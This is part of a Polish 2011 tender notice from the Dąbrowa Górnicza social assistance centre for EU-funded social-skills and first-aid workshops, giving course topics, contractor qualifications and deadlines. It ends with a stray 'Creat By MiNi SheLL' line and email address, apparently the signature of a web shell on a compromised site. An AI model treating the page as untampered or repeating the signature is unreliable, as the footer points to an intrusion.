- zasady wzajemnej współpracy i zaufania w zespole,
- ujawnianie talentów - docenianie poszczególnych ról jednostek zespołu,
- nauka komunikacji - przekazy  werbalne i niewerbalne,
- zaangażowanie w wykonywanie poszczególnych zadań,
- rywalizacja i walka całego zespołu,
- wspólne podejmowanie decyzji i rozwiązywanie problemów,
- pokonywanie słabości,
- opanowanie technik niwelujących stres.
Cel zajęć:
- wyłonienie  lidera odpowiadającego za grupę i podejmowane przez nią decyzje,
- określenie predyspozycji do pełnienia poszczególnych ról zespołowych,
- pogłębienie wiedzy uczestników na temat obowiązków lidera,
- rozwijanie umiejętności niezbędnych w kierowaniu grupą,
- wzmacnianie więzi międzyludzkich,
- wzmocnienie satysfakcji z przynależności do zespołu.
B). WARSZTATY PIERWSZEJ POMOCY 
Czas trwania:  3 godziny zegarowe.
Ilość uczestników: min.23 - max.25 osób.
Forma zajęć: Zajęcia powinny być przeprowadzone w formie warsztatów teoretycznych i praktycznych  w warunkach sali szkoleniowej, z naciskiem na część praktyczną. Szkolenie winno obejmować zabiegi mające na celu pomoc poszkodowanemu w stanie zagrożenia życia i innych sytuacjach wymagających udzielenia pierwszej pomocy. Program szkolenia sporządzony przez Wykonawcę dostosowany będzie do odbiorców, czyli osób dorosłych nie posiadających wykształcenia medycznego.  Szkolenie powinno być zorganizowane zgodne z wytycznymi Europejskiej Rady Resuscytacji (ERC). 
Proponowana tematyka zajęć :
Podczas części teoretycznej i praktycznej warsztatów zostaną poruszone następujące zagadnienia:
- motywacja do udzielania pomocy, przepisy prawne oraz aspekty psychologiczne;
- bezpieczeństwo własne oraz poszkodowanego;
- skuteczne wzywanie pomocy oraz ewakuacja z zagrożonego miejsca;
- podstawy anatomii i fizjologii;
- kontrola podstawowych funkcji życiowych;
- resuscytacja krążeniowo- oddechowa;
- udrażnianie dróg oddechowych;
- rany, krwotoki, złamania, zwichnięcia, skręcenia;
- urazy rdzenia kręgowego, oparzenia, wstrząs oraz nagłe zachorowania;
- skład i sposoby wykorzystania apteczek domowych.
Cel zajęć:
- nabycie umiejętności  związanych z radzeniem sobie w sytuacjach zagrożenia życia lub zdrowia;
- przełamanie lęków związanych z udzielaniem pierwszej pomocy;
- zwiększenie pewności siebie w życiu codziennym dzięki nabyciu nowych wartościowych umiejętności;
- podniesienie świadomości społecznej w zakresie znaczenia udzielania pierwszej pomocy;
- zwiększenie umiejętności i skuteczności działania w sytuacjach kryzysowych.
C). WARSZTATY POPRAWY WIZERUNKU.
Czas trwania:  6 godzin zegarowych.
Ilość uczestników: min.23 - max.25 osób.
Forma zajęć: Zajęcia powinny być przeprowadzone w formie warsztatów teoretycznych i praktycznych w warunkach sali szkoleniowej, z naciskiem na część praktyczną. Uczestnicy powinni zostać zapoznani  z podstawowymi zasadami kreowania wizerunku.  
Proponowana tematyka zajęć :
- podstawowe zasady kreowania własnego wizerunku - prezentacja sposobów ubierania się, malowania, dobierania fryzur, doboru kosmetyków; 
- praktyczne zastosowanie profesjonalnych metod stylistów i wizażystów;
- analiza strukturalna twarzy i analiza kolorystyczna; 
- dobór fryzury i koloru włosów;
- nauka makijażu i stylizacji;
- nauka dostosowania swojego stroju do miejsca i czasu;
- dobór odpowiednich kosmetyków z uwzględnieniem zakupu tańszych, a dobrych produktów.
Cel zajęć:
- nabycie umiejętności kreowania wizerunku i dostosowywania go do sytuacji społecznej przy wykorzystaniu dostępnych zasobów.
D). TRENING SAVOIR-VIVRE.
Czas trwania:  6 godzin zegarowych.
Ilość uczestników: min.23 - max.25 osób.
Forma zajęć: Zajęcia powinny być przeprowadzone w formie warsztatów teoretycznych i praktycznych w warunkach sali szkoleniowej, z naciskiem na część praktyczną. 
Proponowana tematyka zajęć :
- praktyczne i użyteczne zwroty i reguły do zastosowania w codziennej praktyce (powitania, pozdrawiania, przedstawianie się w różnych sytuacjach),
- porządek pierwszeństwa - powitania, przemawiania, zajmowania miejsc podczas oficjalnych i nieformalnych spotkań,
- tytułowanie - formy, zasady, najczęstsze błędy,
- sztuka rozmawiania - kontakt wzrokowy, mowa ciała, aktywne słuchanie, barwa i ton głosu, standardy kontaktu telefonicznego,
- rola i formy przyjęć,
- dobre obyczaje przy stole - kulturalne jedzenie i picie;
- trudne sytuacje w życiu codziennym i zawodowym - konflikty i kwestie sporne w relacjach międzyludzkich,  etykieta.
Cel zajęć:
- kreowanie poprawnych zachowań w grupach,
- rozwinięcie w uczestnikach umiejętności swobodnego poruszania się w sferze społecznej,
- wskazanie zasad poprawnego zachowania w trakcie powszechnych sytuacji związanych z życiem zawodowym, 
- podniesienie poziomu pewności siebie w kontaktach zawodowych,
- zwiększenie pewności siebie w stresujących sytuacjach,  
- nabranie pewności siebie w samodzielnych kontaktach towarzyskich.
E). TRENING PROWADZENIA GOSPODARSTWA DOMOWEGO.
Czas trwania:  6 godzin zegarowych.
Ilość uczestników: min.23 - max.25 osób.
Forma zajęć: Zajęcia powinny być przeprowadzone w formie warsztatów teoretycznych i praktycznych w warunkach sali szkoleniowej,  z naciskiem na część praktyczną.
Proponowana tematyka zajęć :
- nauka planowania realizacji zadań: wyodrębnianie zadań, wyszczególnienie zadań priorytetowych, terminowa realizacja zadań, 
- umiejętność racjonalnego określania,  planowania i zaspakajania swoich potrzeb,
- efektywne gospodarowanie określoną kwotą pieniędzy - diagnoza możliwości finansowych, nauka planowania wydatków gospodarstwa domowego,  nauka planowania najpotrzebniejszych zakupów, nauka oszczędności poprzez umiejętne wybieranie produktów, orientacja w cenach, sposoby oszczędzania. 
- zasady racjonalnego żywienia,
- umiejętność zagospodarowania czasu wolnego,
Cel zajęć: 
- rozwijanie umiejętności efektywnego  zaspokajania swoich potrzeb,
- podniesienie umiejętności prowadzenia gospodarstwa domowego,
- wzrost wiedzy na temat zdrowego sposobu odżywiania się. 

5). Miejsce realizacji zajęć :
- salę zapewnia Zamawiający, 
- w przypadku zajęć realizowanych w warunkach sali szkoleniowej zajęcia odbywać się będą w sali będącej w dyspozycji Zamawiającego, o powierzchni ok. 100m2, znajdującej się przy u. Chemicznej 2 w Dąbrowie Górniczej - Ząbkowicach,
- w przypadku zajęć realizowanych w terenie Wykonawca zapewni teren do realizacji zajęć zgodnie z ich specyfiką i obowiązującymi w tym zakresie.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 55.27.00.00-3, 60.17.20.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa i nie dokonuje oceny w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawcy wykażą, że w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie nastąpi, jeżeli  należycie wykonali co najmniej  jedną usługę szkolenia, z zakresu tematycznie porównywalnego do przedmiotu zamówienia tj. szkolenia w dziedzinie rozwoju osobistego, w formie treningu umiejętności i kompetencji społecznych, o wartości nie mniejszej niż 80 000,00 zł oraz załączą dokument potwierdzający, że usługa ta została wykonana należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa i nie dokonuje oceny w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawcy wykażą, że dysponują  lub będą dysponować osobami zdolnymi  do wykonania zamówienia:
- przynajmniej 2 osoby z wykształceniem wyższym pedagogicznym lub pracownika socjalnego, wyższym z uprawnieniami terapeuty, psychologa lub posiadające inne kwalifikacje zawodowe uprawniające je do  sprawowania opieki nad  osobami z otoczenia - minimum  1 rok  w zawodzie,
- przynajmniej 2 osoby z wykształceniem wyższym z uprawnieniami terapeuty lub posiadające inne kwalifikacje zawodowe uprawniające je do prowadzenia  zajęć z uczestnikami w zakresie szkoleń - minimum 1 rok w zawodzie, 
- przynajmniej 1 osoba z uprawnieniami np. ratownika medycznego, pielęgniarki, lekarza lub inne lub posiadające inne kwalifikacje zawodowe uprawniające je  do prowadzenia  zajęć z zakresu  pierwszej pomocy - minimum 1 rok  praktyki</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa i nie dokonuje oceny w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1 Wypełniony formularz oferty (Załącznik Nr 1 do SIWZ).
2 Pełnomocnictwo do reprezentacji Wykonawcy. Jeżeli ustanowione jest pełnomocnictwo to musi w swej treści jednoznacznie wskazywać uprawnienie do podpisania oferty lub oferty i umowy. Pełnomocnictwo to musi zostać dołączone do oferty i musi być złożone w oryginale lub kopii poświadczonej przez notariusza</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy zgodnie z art. 144 ustawy Pzp w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących przypadkach:
1.Zmiany terminu realizacji przedmiotu zamówienia - na podstawie obiektywnych przesłanek zaakceptowanych przez strony.
2.Zmiany ilości osób (uczestników szkolenia i osób z otoczenia)  na podstawie obiektywnych przesłanek nie dających się przewidzieć ze względu na charakter grupy docelowej</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Dąbrowie Górniczej 
ul. Skibińskiego 1 pok. nr 17, 
41-300 Dąbrowa Górnicza.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2011 godzina 10:30, miejsce: Miejski Ośrodek Pomocy Społecznej w Dąbrowie Górniczej 
ul. Skibińskiego 1 pok. nr 17 
41-300 Dąbrowa Górnicza.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 07.07.2011.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy INTEGRA - Program integracji zawodowej i społecznej osób w Dąbrowie Górniczej współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki 2007-2013, Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, realizowanego przez Miejski Ośrodek Pomocy Społecznej w Dąbrowie Górniczej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com